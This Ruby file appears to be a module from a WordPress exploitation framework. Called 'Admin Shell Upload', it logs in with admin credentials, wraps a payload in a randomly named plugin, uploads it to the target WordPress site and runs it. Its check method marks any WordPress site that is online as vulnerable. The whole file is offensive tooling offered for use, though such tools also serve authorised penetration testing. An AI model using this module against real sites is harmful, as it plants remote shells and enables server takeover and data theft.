# frozen_string_literal: true

class Wpxf::Exploit::AdminShellUpload < Wpxf::Module
  include Wpxf
  include Wpxf::Net::HttpClient
  include Wpxf::WordPress::Login
  include Wpxf::WordPress::Plugin

  def initialize
    super

    update_info(
      name: 'Admin Shell Upload',
      desc: %(
        This module will generate a plugin, pack the payload into it and
        upload it to a server running WordPress; providing valid admin
        credentials are used.
      ),
      author: [
        'rastating'
      ],
      date: 'Feb 21 2015'
    )
  end

  def check
    return :vulnerable if wordpress_and_online?
    :unknown
  end

  def requires_authentication
    true
  end

  def run
    return false unless super

    emit_info 'Uploading payload...'
    res = upload_payload_as_plugin_and_execute(
      Utility::Text.rand_alpha(10),
      Utility::Text.rand_alpha(10),
      session_cookie
    )

    !res.nil?
  end
end
